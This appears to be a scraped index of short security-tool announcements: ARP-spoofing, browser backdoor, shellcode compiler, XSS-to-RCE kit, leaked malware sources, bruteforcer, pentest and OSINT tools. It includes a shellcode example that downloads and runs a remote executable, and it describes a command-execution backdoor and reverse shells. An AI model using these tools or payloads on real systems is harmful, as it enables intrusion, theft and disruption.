Kick Devices Off Your Network - KickThemOut

A tool to kick devices out of your network and enjoy all the bandwidth for yourself. It allows you to select specific or all devices and ARP spoofs them off your local area network.
Compatible with Python 2.6 & 2.7.
Authors: Nikolaos Kamarinakis & David Schütz

Installation
You can download KickThemOut by cloning the Git Repo and simply installing its requirements:

$ git clone https://github.com/k4m4/kickthemout.git

$ cd kickthemout

$ pip install -r requirements.txt

Demo
Here's a short demo:

(For more demos click here )


Disclaimer
KickThemOut is provided as is under the MIT Licence (as stated below). It is built for educational purposes only. If you choose to use it otherwise, the developers will not be held responsible. In brief, do not use it with evil intent.

Download KickThemOut

Read More

Backdoor C&C for Populars Browsers - Chromebackdoor

Chromebackdoor is a pentest tool, this tool use a MITB technique for generate a windows executable ".exe" after launch run a malicious extension or script on most popular browsers, and send all DOM datas on command and control.

VIDEO

• Install Text (V 3.0)
• Install Video (OLD)
• Binder guide
• Module guide
• Form grabber plugins
• Facebook MessengerSpy plugins
• Jabber Notifier/ Hide Panel
• Windows infection
• Rubber Ducky Payload

Require:

• pip install crxmake
• wine32

Let's go

python chromebackdoor.py

web browser infection

• pour rappel, infiltrer, surveiller, un système informatique sans autorisation est un délit
• reminder, infiltrate, monitor, computer system without authorization is a crime

Download Chromebackdoor

Read More

Shellcode C/C++ Compiler for Windows - ShellcodeCompiler

Shellcode Compiler is a program that compiles C/C++ style code into a small, position-independent and NULL-free shellcode for Windows. It is possible to call any Windows API function in a user-friendly way.

Shellcode Compiler takes as input a source file and it uses it's own compiler to interpret the code and generate an assembly file which is assembled with NASM ( http://www.nasm.us/ ).

Shellcode compiler was released at DefCamp security conference in Romania, November 2016.

Command line options

    -h (--help)      : Show this help message
    -v (--verbose)   : Print detailed output
    -t (--test)      : Test (execute) generated shellcode
    -r (--read)      : Read source code file
    -o (--output)    : Output file of the generated binary shellcode
    -a (--assembbly) : Output file of the generated assembly code

Source code example

    function URLDownloadToFileA("urlmon.dll");
    function WinExec("kernel32.dll");
    function ExitProcess("kernel32.dll");

    URLDownloadToFileA(0,"https://site.com/bk.exe","bk.exe",0,0);
    WinExec("bk.exe",0);
    ExitProcess(0);

Invocation example

    ShellcodeCompiler.exe -r Source.txt -o Shellcode.bin -a Assembly.asm

Limitations

1. It is not possible to use the return value of an API call
2. It is not possible to use pointers or buffers
3. It is not possible to declare variables

All these limitations will be fixed as soon as possible. However, many other limitations will exist. This is an Alpha version. Please report any bugs or suggestions.

Download ShellcodeCompiler

Read More

iOS App Security Assessment Tool - idb

idb is a tool to simplify some common tasks for iOS app security assessments and research. Please see the Documentation for a more detailed summary of each function.

Features

• Assessment Setup
  • SSH port forwarding
  • Installation of helper utilities
• App Information
  • Bundle information
  • Registered URL Schemes
  • Platform and SDK Versions
  • Data folder location
  • Entitlements
• Data Storage
  • List plist files and data protection class
  • List sqlite files and data protection class
  • List Cache.db files and data protection class
  • Full app file system browser
    • Browse files
    • Download/view files
    • Check data protection
    • Rsync folders and keep git revisions
  • Dump iOS keychain
• Binary Analysis
  • Check for encryption
  • Check for protections (ASLR/PIE, DEP, ARC)
  • List shared libraries
  • Extract strings in app binary
  • Dump class and method signatures
• IPC
  • List URL handlers
  • Invoke and fuzz URL handlers
  • Monitor the iOS pasteboardA
• Other Tools
• Check for iOS backgrounding screenshot
• Install certificates
• Edit /etc/hosts file

Download idb

Read More

Caffeinated Packet Analyzer - Dripcap

Caffeinated packet analyzer. Dripcap is a modern packet analyzer based on Electron.

Getting Started

• Download & Install
• Capturing
• Packet Filtering
• Display Filter Syntax

Advanced Usage

• Build from source
• Import Pcap Files
• Install Add-on Packages

Create & Publish Your Package

• Create Theme Package
• Create Dissector Package
• Create UI Package
• Publish Package

Dissector Overview

• Dissection Process
• Namespace
• Create a Custom Dissector Class

API Reference

• UI Classes
• Builtin Dissector Classes

Download Dripcap

Read More

From XSS to RCE - XSSER

From XSS to RCE 2.5 - Black Hat Europe Arsenal 2016

Demo

• Version 2.0 - 2015: https://www.youtube.com/playlist?list=PLIjb28IYMQgqqqApoGRCZ_O40vP-eKsgf
• Version 2.5 - 2016: https://www.youtube.com/playlist?list=PLRic6PgcrsWGkgacL6WFnSQKVRZIoofRj

Requirements

• Python (2.7.*, version 2.7.11 was used for development and demo)
• Gnome
• Bash
• Msfconsole (accessible via environment variables)
• Netcat (nc)
• cURL (curl) [NEW]
• PyGame (apt-get install python-pygame) [NEW]

Payload Compatibility

• Chrome (14 Nov 2015) - This should still work.
• Firefox (04 Nov 2016) - Tested live at Black Hat Arsenal 2016

WordPress Lab

• WordPress http://wordpress.org/
• Better WP Security 3.5.3 http://www.exploit-db.com/wp-content/themes/exploit/applications/c6d6beb3c11bc58856e15218d512b851-better-wp-security.3.5.3.zip
• Optional: WPSEO https://yoast.com/wordpress/plugins/seo/

WordPress Exploit

• http://www.exploit-db.com/exploits/27290/

Joomla Lab

• Joomla https://www.joomla.org/
• SecurityCheck 2.8.9 https://www.exploit-db.com/apps/543ccd00b06d24be139d7e18212a0916-com_securitycheck_j3x-2.8.9.zip

Joomla Exploit

• https://www.exploit-db.com/exploits/39879/

Directories

• Audio: Contains remixed audio notifications.
• Exploits: Contains DirtyCow (DCOW) privilege escalation exploits.
• Joomla_Backdoor: Contains a sample Joomla extension backdoor which can be uploaded as an administrator and subsequently used to execute arbitrary commands on the system with system($_GET['c']).
• Payloads/javascript: Contains the JavaScript payloads. Contains a new "add new admin" payload for Joomla.
• Shells: Contains the PHP shells to inject, including a slightly modified version of pentestmonkey's shell that connects back via wget.

Developed By

• Hans-Michael Varbaek
• Sense of Security

Credits

• MaXe / InterN0T

Download XSSER

Read More

Collections of Malware source code - Leaked

This is leaked source code of Malwares.

Obs, I am not responsible for your actions

Source from:

http://www.malwaretech.com/p/sources.html Dexter v2 (Point of Sales Trojan) Rovnix (Bootkit) Carberp (Banking Trojan) Tinba (Tiny ASM Banking Trojan) Zeus (Banking Trojan) KINS (Banking Trojan) Dendroid (Android Trojan) Grum (Spam Bot) Pony 2.0 (Stealer) Alina Spark (Point of Sales Trojan) RIG Front-end (Exploit Kit)

Download Malware Source Code (OFF)

Read More

Collaborative Penetration Test and Vulnerability Management Platform - Faraday v2.2

Faraday is the Integrated Multiuser Risk Environment you were looking for! It maps and leverages all the knowledge you generate in real time, letting you track and understand your audits. Our dashboard for CISOs and managers uncovers the impact and risk being assessed by the audit in real-time without the need for a single email. Developed with a specialized set of functionalities that help users improve their own work, the main purpose is to re-use the available tools in the community taking advantage of them in a collaborative way!

This release features a brand new library to connect with Faraday Server!

Managing vulnerabilities is now easier in Faraday!

Status and creator fields

A simple change can go a long way - we added two new ways of classifying issues stored in Faraday.

With the new update it is now possible to check the status of an issue - this could be opened, closed, re-opened or the risk is accepted.

If you set a vulnerability status as closed and later on when you re-scan the target the same issue is found again, the status will automatically change into re-opened allowing you to have a more granular view of the results of your scans. This is perfect for doing remediation retests, helping you to quickly understand what is still vulnerable.

Also, issues created by a specific tool, can now be filtered and sorted out. A great way to see where are the sources of information used during an engagement.

For example, as we can see in the following screenshots, we have three different issues that are closed [1]. After we import a Nessus scan the issues are marked as re-opened [2], indicating that the vulnerability is still present in the last scan.

1. Closed issues

2. Re-opened by Nessus scan import

Corporate Changes:

• Added a message to configure the Webshell - added a descriptive message for users who don’t have the Webshell properly configured

Webshell configuration message

Changes:

• New library to connect with Faraday Server 
• Fixed Fplugin, now it uses the new library to communicate with the Server 
• New fields for Vulnerabilities: plugin creator and status
• Refactor in Faraday Core and GTK Client 
• Bug fixing in Faraday Client and Server 

• News boxes example in the WEB UI
• New plugins: Dirb, Netdiscover, FruityWifi, Sentinel 
• Improvements on the WPscan plugin 
• Fixed Licenses search - there was a bug that disabled the option to search for licenses, now it is fixed and full-text search is enabled in the Licenses component

Licenses search

• Refactor Licenses module to be compatible with JS Strict Mode - in our efforts to improve our existing codebase for the WEB UI we refactored this component in order to make it run using Strict Mode in JavaScript

https://www.faradaysec.com
https://github.com/infobyte/faraday
https://twitter.com/faradaysec
https://forum.faradaysec.com/

Download Faraday

Read More

A Single File Bruteforcer Supports Multi-Protocol - F-Scrack

F-Scrack is a single file bruteforcer supports multi-protocol, no extra library requires except python standard library, which is ideal for a quick test.

Currently support protocol: FTP, MySQL, MSSQL，MongoDB，Redis，Telnet，Elasticsearch，PostgreSQL.

Compatible with OSX, Linux, Windows, Python 2.6+.

Usage
Options:

python F-Scrack.py -h 192.168.1 [-p 21,80,3306] [-m 50] [-t 10]

-h
Supports ip(192.168.1.1), ip range (192.168.1) (192.168.1.1-192.168.1.254), ip list (ip.ini) , maximum 65535 ips per scan.
-p
Ports you want to scan, use comma to separate multi ports. Eg 1433,3306,5432. 
Default scan ports(21,23,1433,3306,5432,6379,9200,11211,27017) if no ports specified.
-m
Number of threads. Default is 100.
-t
Seconds to wait before timeout.
-d
Dictionary file.
-n
Scan without ping scan(Live hosts detect).

Example:

python F-Scrack.py -h 10.111.1
python F-Scrack.py -h 192.168.1.1 -d pass.txt
python F-Scrack.py -h 10.111.1.1-10.111.2.254 -p 3306,5432 -m 200 -t 6
python F-Scrack.py -h ip.ini -n

Download F-Scrack

Read More

Get detailed information about a Twitter user activity - Tinfoleak v2.0

Are you interested in OSINT tools? Tinfoleak is the best OSINT tool for Twitter, and is open-source!
The new version includes a lot of new and improved features:

• Search by coordinates
• Geolocated users
• Tagged users
• User conversations
• Identification in other social networks
• More powerful and flexible search filter
• More detailed information on existing features
• … and many more information to generate intelligence!

Screenshots

Download Tinfoleak V2.0

Read More